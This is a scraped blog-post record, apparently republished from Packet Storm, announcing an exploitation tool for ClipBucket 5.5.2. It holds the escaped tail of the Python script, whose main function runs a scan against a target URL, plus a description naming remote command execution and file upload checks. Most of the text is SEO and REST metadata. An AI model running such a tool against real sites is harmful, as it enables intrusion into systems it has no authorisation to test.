ClipBucket Exploitation Scanner \u2551\\n \u2551 By indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”\\”\\” + \\”\\\\033[0m\\”)\\n \\n if len(sys.argv) \\u003c 2:\\n print(\\”Usage:\\”)\\n print(f\\” python {sys.argv[0]} \\u003ctarget_url\\u003e\\”)\\n print(\\”\\\\nExamples:\\”)\\n print(f\\” python {sys.argv[0]} https:\/\/example.com\\”)\\n print(f\\” python {sys.argv[0]} http:\/\/192.168.1.100\\”)\\n print(f\\” python {sys.argv[0]} http:\/\/localhost\/clipbucket\\”)\\n return\\n \\n target = sys.argv[1]\\n \\n # \u0625\u0636\u0627\u0641\u0629 http:\/\/ \u0625\u0630\u0627 \u0644\u0645 \u064a\u0643\u0646 \u0645\u0648\u062c\u0648\u062f\u0627\u064b\\n if not target.startswith((‘http:\/\/’, ‘https:\/\/’)):\\n target = ‘http:\/\/’ + target\\n \\n # \u0625\u0646\u0634\u0627\u0621 \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0643\u0644\u0627\u0633\\n exploiter = ClipBucketExploiter(target)\\n \\n try:\\n exploiter.run_complete_scan()\\n except KeyboardInterrupt:\\n print(\\”\\\\n\\\\nScan interrupted by user\\”)\\n except Exception as e:\\n print(f\\”\\\\nError during scan: {str(e)}\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212539″,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212539\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-08T16:29:11″,”description”:”An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation. It checks for remote command execution, file upload,…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-29325","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool_PACKETSTORM:212539 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=29325\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool_PACKETSTORM:212539 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-08T16:29:11″,”description”:”An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation. It checks for remote command execution, file upload,...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=29325\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-08T10:42:42+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"17 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29325#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29325\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool_PACKETSTORM:212539\",\"datePublished\":\"2025-12-08T10:42:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29325\"},\"wordCount\":3247,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.5\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29325#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29325\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29325\",\"name\":\"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool_PACKETSTORM:212539 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-08T10:42:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29325#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29325\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29325#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool_PACKETSTORM:212539\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool_PACKETSTORM:212539 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=29325","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool_PACKETSTORM:212539 - zero redgem","og_description":"{“lastseen”:”2025-12-08T16:29:11″,”description”:”An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation. It checks for remote command execution, file upload,...","og_url":"https:\/\/zero.redgem.net\/?p=29325","og_site_name":"zero redgem","article_published_time":"2025-12-08T10:42:42+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"17 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=29325#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=29325"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool_PACKETSTORM:212539","datePublished":"2025-12-08T10:42:42+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=29325"},"wordCount":3247,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.5","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=29325#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=29325","url":"https:\/\/zero.redgem.net\/?p=29325","name":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool_PACKETSTORM:212539 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-08T10:42:42+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=29325#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=29325"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=29325#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool_PACKETSTORM:212539"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29325","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=29325"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29325\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=29325"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=29325"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=29325"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}